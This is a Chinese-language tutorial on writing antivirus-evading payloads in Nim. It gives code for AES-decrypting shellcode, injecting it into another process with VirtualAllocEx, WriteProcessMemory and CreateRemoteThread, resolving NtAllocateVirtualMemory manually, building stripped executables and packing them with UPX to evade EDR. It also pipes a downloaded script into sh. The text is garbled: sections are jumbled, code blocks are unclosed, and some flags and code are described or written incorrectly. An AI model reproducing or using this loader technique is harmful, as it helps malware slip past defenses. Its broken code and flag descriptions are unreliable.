# 如何使用Nim-lang進行免殺測試
## 前言
在安全測試和紅隊評估中,繞過殺毒軟件(AV)檢測是常見需求。Nim語言因其跨平臺特性、靈活的語法和可編譯為C代碼的能力,正逐漸成為編寫免殺Payload的熱門選擇。本文將介紹如何利用Nim-lang進行有效的免殺測試。
---
## 一、Nim語言優勢
1. **跨平臺編譯**
Nim可編譯為Windows/Linux/macOS的可執行文件,支持交叉編譯
2. **語法簡潔**
類Python的語法降低了開發門檻
3. **底層控制能力**
可直接調用Windows API,實現底層操作
4. **混淆特性**
編譯后的代碼具有獨特特征,天然規避部分特征檢測
---
## 二、環境準備
### 1. 安裝Nim
```bash
# Linux/macOS
curl https://nim-lang.org/choosenim/init.sh -sSf | sh
# Windows
使用官方安裝包或choosenim
nimble install winim # Windows API綁定
nimble install nimcrypto # 加密庫
import winim/lean
proc main() =
let
msgBox = cast[proc (a: HWND, b: LPCSTR, c: LPCSTR, d: UINT): INT](GetProcAddress(LoadLibraryA("user32.dll"), "MessageBoxA"))
msgBox(0, "Security Test", "Nim Payload", 0)
when isMainModule:
main()
import nimcrypto
proc decryptStr(encrypted: string, key: string): string =
var ctx: AESCTR
ctx.init(key)
result = ctx.decrypt(encrypted)
ctx.clear()
let payload = decryptStr("加密的Shellcode", "your_key")
import winim
proc injectToProcess(pid: DWORD, shellcode: ptr byte) =
var
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid)
rPtr = VirtualAllocEx(hProcess, NULL, shellcode.len, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
WriteProcessMemory(hProcess, rPtr, shellcode, shellcode.len, NULL)
CreateRemoteThread(hProcess, NULL, 0, cast[LPTHREAD_START_ROUTINE](rPtr), NULL, 0, NULL)
type
NtAllocateVirtualMemory = proc(hProcess: HANDLE, baseAddr: PVOID, zeroBits: ULONG, size: PSIZE_T, allocType: ULONG, protect: ULONG): NTSTATUS {.stdcall.}
var
ntdll = LoadLibraryA("ntdll.dll")
ntAlloc = cast[NtAllocateVirtualMemory](GetProcAddress(ntdll, "NtAllocateVirtualMemory"))
nim c -d:release --opt:size --passL:-s --cpu=amd64 --app=console --out=payload.exe payload.nim
參數說明:
- --opt:size 最小化文件體積
- -d:strip 去除調試信息
- --passL:-s 靜態鏈接
推薦使用UPX等工具進行二次處理:
upx --best payload.exe
靜態檢測
使用VirusTotal檢查基礎檢測率
行為檢測
在沙箱環境中測試行為特征
EDR繞過
針對企業級防護進行測試
